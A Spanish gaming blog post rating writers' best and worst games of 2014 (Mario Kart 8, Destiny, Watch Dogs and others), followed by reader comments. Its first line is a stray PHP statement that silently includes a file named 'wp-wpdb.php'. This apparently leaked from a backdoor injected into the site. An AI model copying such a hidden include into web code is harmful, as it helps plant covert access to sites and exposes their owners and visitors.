if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); GOTY y FOTY 2014 – La Fortaleza de LeChuck

GOTY y FOTY 2014

Un año más que acaba y no exento de polémica por lanzamientos de juegos inacabados, como ya comentamos extensamente en el último Podcast. Este año 2014 volvemos a repasar los mejores juegos y los peores (fails, fracasos…) de la mano de nuestros redactores habituales de La Fortaleza de LeChuck.

goty_2014

Museboy

GOTY: Mario Kart 8.

La octava parte de Mario Kart llega dejando atrás la locura de Mario Kart Wii y mejora la experiencia de Mario Kart 7 de Nintendo DS, premiando en mayor medida a los jugadores habilidosos y equilibrando ese azar que hacía perder los papeles al más pintado. Mario Kart 8 también incluye un montón de circuitos y personajes, e incluso los DLC son contenido a destacar que a un precio decente nos suma cantidad y calidad. Y por si fuera poco, el aspecto técnico es formidable, con unas animaciones bien trabajadas y gran sensación de suavidad gracias a sus 60 FPS.

FOTY: Destiny.

Una nueva franquicia de Bungie, después de haberse coronado con la saga Halo en Halo Reach, era de lo más esperado del año para todos sus fans. Sin embargo, con un gameplay y gunplay genial, se quedó en tierra de nadie por una falta de contenido insultante, con una «campaña» que termina sin darte un final y muchos otros problemas de diseño, que hizo que el juego que debía durar 10 años no me diera más que para dos semanas. Los FPS deben medir tu habilidad como jugador, y no depender de un nivel que directamente equivale al número de horas que hayas jugado.

 

Arashi

GOTY: Wasteland 2

¿Qué puedo decir de Wasteland 2 que no haya dicho ya? Pues que se agradece que de vez en cuando asomen propuestas como esta en un sector cada vez más enfocado a lo casual y a títulos simplificados. Wasteland 2 combina a las mil maravillas la exploración, las misiones principales, secundarias y la acción. Inexplicables sensaciones al recorrer las viejas ciudades abandonadas, y al visitar los nuevos pueblos y conocer la historia de sus habitantes. La magia de los primeros Fallout florece de nuevo con Wasteland 2. Un imprescindible para tu PC.

FOTY: Halo: The Master Chief Collection

Voy a comenzar otra vez en pregunta: ¿Qué pasa cuando un juego se alimenta prácticamente de su multijugador y este no responde tras varios parches? Posiblemente la gente se cabree, se entristezca y abandone el juego. 343 Industries ha decepcionado a la comunidad de Halo, y tras varios parches (si mal no recuerdo han salido 6) ha perjudicado la imagen de la marca y ha acabado con la ilusión de mucha gente. Ha pasado más de un mes de su lanzamiento y parece que ya funciona en condiciones, pero el flujo de lanzamientos en este sector es constante y esto no se lo puede permitir una compañía, ya que a estas alturas mucha gente ha olvidado el juego. La vuelta al mercado de los mejores títulos de Halo ha sido verdaderamente agridulce.

 

Daiichi

GOTY: Super Smash Bros. for Wii U

En cierta manera, me vi obligado a decantarme por este título de cara a otorgar el galardón de juego del año, pues a lo largo de este 2014, y siempre según mi opinión, no ha habido ninguna obra capaz de hacerle sombra. El único que puede plantearse competir con él es Mario Kart 8, otro juego que no aporta nada nuevo pero que lo que plantea lo hace a la perfección.

Con respecto a SSB4, nos ofrece la misma jugabilidad clásica de un Smash pero perfeccionada hasta el mínimo detalle, muy bien pulida y balanceada, facilitando que cualquier usuario, fanático o neófito, pueda coger el mando, echar unas partidas sin mayor complicación y divertirse (mucho) con ello. Además, nos encontramos ante uno de los planteles de personajes más extensos y variados de cualquier juego de lucha, con grandes incorporaciones como Megaman, Pac-man, Shulk o Duck Hunt Dúo que se unen a los clásicos Mario, Link, Donkey Kong y cía., proporcionándonos combates vistosos, épicos y algo alocados con personajes de ayer y hoy. También es destacable la ingente cantidad de contenido que ofrece esta obra, con muchos modos de juego para que nadie se aburra, una gran cantidad de coleccionables como técnicas personalizables o trofeos, y una selección musical de auténtico lujo y que además podremos editar a nuestro antojo en función del escenario. Como veis, un juego de 10, y es que el GOTY de este año podía ser otro que no fuera Super Smash Bros. for Wii U.

FOTY: Destiny

El caso de este juego es muy paradójico y nos sirve como ejemplo para reflejar el estado actual de la industria del videojuego. Desde el principio se presentó con perspectivas de ser un gran proyecto que abarcaría varios títulos, con vocación de fundar una saga importante, generando mucho hype a su paso y sembrando unas expectativas que al final no ha podido cumplir en casi ningún aspecto. También sirve como abanderado de esta tendencia tan negativa de sacar juegos inacabados y sin probar, que son completados y refinados mediante actualizaciones y parches continuos, lo que da una sensación de juego en continua mutación y que no tiene ni una personalidad ni una intención definidas. Luego nos encontramos ante lo que viene a ser, quizá, lo más decepcionante del juego, ausencia de mucho contenido, pues nos ofrece unas opciones de personalización muy básicas y limitadas, por no hablar de un guión insulso y muy mal llevado que no enganchará a nadie. Dudo mucho que nadie llegue a sentir realmente como suya la tarea de salvar el universo de la oscuridad, sobretodo por como está planteada en el juego, sin mucho trasfondo, con personajes faltos de todo carisma y enemigos con menos personalidad que un masilla de los Power Rangers.

En definitva, lo único que se puede valorar positivamente de este título es el hecho de contar con un gameplay muy sólido que hereda de la saga HALO con mucho descaro (aún que si bien es cierto que si algo funciona bien, para qué cambiarlo), y un aspecto gráfico bastante potente que puede permitirse la chulería de decir que es de next-gen pese a estar a caballo entre esta y la anterior. Por lo demás no es una experiencia que valga la pena en la actualidad, quizá con parches y actualizaciones consiguen llegar a arreglarla algún día, pero no será pronto.

 

Heko

GOTY: La Tierra Media: Sombras de Mordor (también conocido como “Chadous of mordor”)

Constituye la sorpresa agradable en un año bastante flojo en general, en lo que respecta a los lanzamientos importantes, además de ser una nueva IP en un sector plagado de secuelas y entregas anuales de las mismas sagas de siempre. No sólo eso, me atrevería a decir que estamos ante un título que va a ser el más influyente de este año, sobre todo gracias a la incorporación del llamado “Sistema Némesis”, que consigue con certeza crear la ilusión de que este mundo jugable plagado de orcos, uruks, y demás fauna maligna perteneciente a la mitología del Señor de los Anillos, está vivo y evoluciona dependiendo de las acciones que tome el jugador. A pesar de parecer, tanto en vídeos como en un primer contacto, un título genérico que copia mecánicas de otros ilustres, como Assassins Creed o la saga Batman Arkham, debemos darle una oportunidad y nos encontraremos ante un título brillante. Sombras de Mordor cuenta con una historia interesante, no espectacular, pero sí por encima de la media (gana puntos si nos gusta el universo en el que se basa), una buena cantidad de objetivos que cumplir, objetivos que matar, y una nada desdeñable porción de Tierra Media que explorar. En otros años estaríamos hablando del gran “sleeper” que pasó desapercibido. Por suerte en esta ocasión ha conseguido llegar al público entendido, entre otras cosas gracias al “boca-oreja” de los jugadores, y tenemos el placer de verlo lucirse en toda su magnificencia en más de una lista de GOTYS de este 2014. Bien por él.

FOTY: Watch Dogs

Si entendemos “FOTY” como el fracaso del año, para mí ese tiene un nombre: WATCH DOGS. Puede que objetivamente no sea un mal juego, pero teniendo en cuenta que me pareció aburrido, tedioso y mal terminado, así lo considero. El gran problema que tiene este título lo arrastra desde el E3 de 2012, momento en el que se enseñó al mundo un vídeo de supuesto gameplay, realmente espectacular y que todos recordaremos… Si no, os invito a buscarlo. De lo prometido en ese vídeo, a lo que realmente nos encontramos una vez que pudimos hincarle el diente en marzo de este año hay mucha diferencia, y no sólo en el tan cacareado “downgrade”, que al fin y al cabo casi es lo de menos. Simplemente el juego no engancha, y todas las posibilidades que nos vienen a la mente al creernos en la piel de un hacker todopoderoso, capaz de poner la tecnología de la ciudad de nuestra parte, se queda en agua de borrajas y se pierde en un argumento que no está a la altura de lo esperado. Además, el juego transmite una sensación de dejadez en muchos momentos que distan al producto de ser la gran revolución prometida. Los problemas técnicos y los parches post-lanzamiento, tan habituales por desgracia de Ubisoft, no han ayudado a mejorar su imagen. Un caso más, éste demasiado evidente, de “muerte por Hype”.

 

RazorKaen

GOTY: South Park: The Stick of Truth

Meses antes del estreno de South Park: The stick of truth pocos nos hacíamos la idea de que un videojuego de aventuras por turnos basado en los personajes irreverentes e irrespetuosos de la serie de animación para adultos diera resultado. Sin embargo, Trey Parker y Matt Stone (creadores de la serie) en colaboración con el reconocido estudio Obsidian crearon una obra maestra incomparable llena de gags divertidos, sátiras propias de la serie respetando la esencia de esta milímetro por milímetro, y convirtiendo el juego en el mejor capítulo de South Park del año (Algo difícil de creer pues la serie está a un nivel superlativo) Además de amigable con el jugador que apenas ha visto la serie de televisión, con un sistema por turnos divertido y rápido, además de múltiples parodias de videojuegos de rol occidental. Con todo esto y más South Park: The stick of truth es, en lo personal, el mejor juego del año, no solo por partir en base a un riesgo creativo sino por superarlo y darnos la mejor adaptación de una IP desde Riddick, cargada de diversión, acción y parodias divertidas que no hemos visto a menudo en nuestro medio, y menos aún en un videojuego, que busca ser un capitulo de South Park pero también un videojuego y lo consigue sin sacrificar sus mecánicas de juego. Completamente recomendado

FOTY: Watch Dogs

Watch Dogs se erigía como la propuesta revelación del 2014, aún cuando ahondara en un más que conocido modo sandbox que bebía directamente desde la experiencia Grand Theft Auto (o así es como nos vendió el juego Ubisoft en los carteles publicitarios) Sin embargo, tras retrasos y downgrade gráfico, el juego no podía ser peor, una decepción total con una trama genérica, una conducción horrible, personajes mal estructurados, clichés narrativos, mecánicas genéricas y ya vistas en otros títulos, incluso el sistema hacker es usado de manera pueril y trivial, la violencia no se cohesiona correctamente con la trama y el personaje principal no podía ser menos interesante, esto sumado a la incontable cantidad de bugs de la que hacen gala la mayoría de juegos de Ubisoft a su estreno, termina siendo el «Fracaso del año» Pues en un año como el 2014 donde hemos visto decepciones generalizadas en los AAA (Castlevania, THIEF…) es sorprendente el nivel de decisiones creativas en las cuales fracasa Watch Dogs, un título que personalmente no aporta nada y termina por hartarme como jugador.

Y ahora te toca a ti, ¿Cuál ha sido tu GOTY y FOTY?

Publicada el
Categorizado como Reportaje Etiquetado como ,

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

12 comentarios

  1. De verdad, anda que poner como FOTY el Watch Dogs… Es un buen juego, tubo problemas de optimización al principio y odio que la gente se meta con el por que es un sandbox que se basa más en la historia, es verdad, es así, pero cada juego puede hacer lo que quiera, no tiene por que ser 100% sandbox como GTA, obviamente el GTA da muchísimas más horas de juego, es indiscutible, el GTA es indiscutiblemente mejor y más extenso que el Watch Dogs, pero no por ello hay que menospreciarlo.

    1. Es que no le critico (al menos yo) por no ser como GTA, incluso no le critico por los bugs, es que todo lo que intenta lo hace de la peor manera posible:

      1. Su historia: La señalas como punto fuerte y en el que se basa, pero es fatal, dialogos inconexos, una venganza pueril y repetitiva en los videojuegos (y mas en los de Ubilol) y que ademas gira alrededor de una sobrina con la cual el jugador nunca puede empatizar o encontrar porque nuestro personaje siente tanta empatia con ella. Ademas nuestro personaje es lo mas erratico posible, contradictorio (con frases de heroe y salvador justo para ponerse a tirotear gente en una que otra mision) Ademas Ubi vuelve a caer en la tara de mostrarnos hackers como estrellas, con glamour impropio de su oficio, sin una critica social fuerte (que esta ahi pero nunca bien detallada) y donde la accion no es un medio para narrar historia sino un metodo para solucionar un objetivo inconexo con el personaje y con su propia historia (el error de GTA, incluso critico que busque ser GTA dandonos violencia gratuita)

      2. Horas de juego: Nunca voy a juzgar un titulo por las horas de juego que me de (South Park no dura mas que 8 y es mi GOTY, ojo) sino como las aprovecha, Watch Dogs las aprovecha fatal, con un sistema de Hackeo trivial y poco, muy poco aprovechado (e innecesario, puesto siempre como un secundario horrible) Con una conduccion horripilante y que no entiendo las decisiones tecnicas tras tal desproposito, joder, el juego en solo su fase sandbox esta fatal diseñado, ahora su historia no da razones para continuarlo solo para «ver como termina» donde ninguno de esos personajes y sus historias me empujan a querer continuar a ver como se desenvuelven, Watch Dogs esta roto,

      ¿No quiere ser GTA? PERFECTO, alabo a Sleeping Dogs por alejarse de GTA y con sus propias herramientas lo hace perfecto, Yakuza tiene fundamentos totalmente distintos a un GTA y lo hace perfecto, Watch Dogs Tenia papeles para hacer un gran juego y en conjunto es una suma de fracasos sin sentido, nisiquiera la historia que hablas logra sostener el juego (si no que lo hunde aun mas)

      Y me dejo mas detalles, pero ten por seguro que la historia es lo peor del titulo (al menos de mi parte).

      Un saludo!

      1. Tienes razón en varias cosas:
        1.No empatizas, y si comparamos con The Last of Us vemos como en cambio, con Eli si que empatizas muchísimo, es como si fuera tu hija, yo incluso lloré, en cambio en Watch Dogs solo ves el accidente y no consigue que me sienta feliz o triste según mis acciones, simplemente es por jugar, y en eso tienes toda la razón.
        2.El sistema de Hacekos es una mierda, la parte de ir hackeando la ciudad esta guay, pero los puzles que había que resolver eran una mi*rd* con patatas, siempre era lo mismo, ir girando tubitos, y eso se podría haber solucionado añadiendo diferentes tipos de puzzles, no aumentando su dificultad hasta unos extremos que llegaba a aburrir.

        ¿Ves? Yo no comparto tu opinión en cuanto a que sea un mal juego, pero si que respeto tus argumentos, y si son verdad hay que decirlo, simplemente a mi me gusta, y tal vez no me expresé bien en el otro comentario.

        1. No problema, en ningun momento dije que no me gustara tu opinion, sino que usabas como argumento a GTA y debia explicar mejor mi critica, si te gusta esta bien, en ningun momento me lo plantee como un ataque sino como una malinterpretacion de mi texto 😉

          Un saludo!

    2. Para mí es la decepción absoluta del año, por todo lo que prometía llegar a ser y en lo que se quedó finalmente… En ningún momento lo comparo con ningún otro sandbox (de hecho ni menciono la palabra), así que sus fallos no se los tengo en cuenta por compararlo con GTA V, ni mucho menos. No quiero alargarme sobre sus defectos, RazorKaen te ha enumerado un par de ellos que suscribo totalmente, y en concreto la historia me parece totalmente ridícula. De todas maneras, como decía Clint Eastwood en una de sus películas: «Las opiniones son como los culos, todo el mundo tiene uno». Estos son los gotys y fotys nuestros, y no tenemos por qué estar de acuerdo, ni mucho menos. It’s magic.

      Un saludo!

      1. Claro, eso es obvio, es simplemente mi opinión, no digo que la vuestra no sea válida ni nada por el estilo, faltaría más… Simplemente no la comparto y por ello comento, pero valoro y respeto la opinión de todo el mundo. Bueno, hay una lista de gente a la que no respeto, pero es muy personal xD

  2. Yo ya lo indiqué en Twitter… No soy un hombre de AAA 🙂 y si hay un
    juego que me ha dejado muy pasmado este año, ese ha sido «Kentucky Road
    Zero»… Y como no me gusta resaltar los que no me han gustado… pues
    prefiero quedarme con ese buen sabor de boca… No ha sido el único…
    El «Kero Blaster» es una maravilla 🙂 y el «Super Time Force» ya no
    decir, es increíble lo que han hecho con el género de disparos
    plataformeros con ese juego … del «Hyper Light Drifting» no digo nada,
    porque por ahora sólo tengo una demo, pero lo que he visto también me
    parece genial 😀

    1. Como comento en el podcast de los gotys, a raíz del comentario sobre el «Kentucky Road Zero» y por lo que he visto sobre él, bien merecería seguramente estar entre los mejores del año, y le tengo muchas ganas. Estoy deseando que algún día lo rebajen en Steam, que de momento no hay manera… A ver si el tito Gaben aún me da una alegría estas navidades… 🙂

      1. Está a un precio que yo no recuerdo haber pagado… No sé si le dieron alguna rebaja ya este año… por cierto, que llevo llamándolo «Kentucky ROAD Zero» todo el rato, no se me mete lo de «Route» en la cabeza xD

Dejar un comentario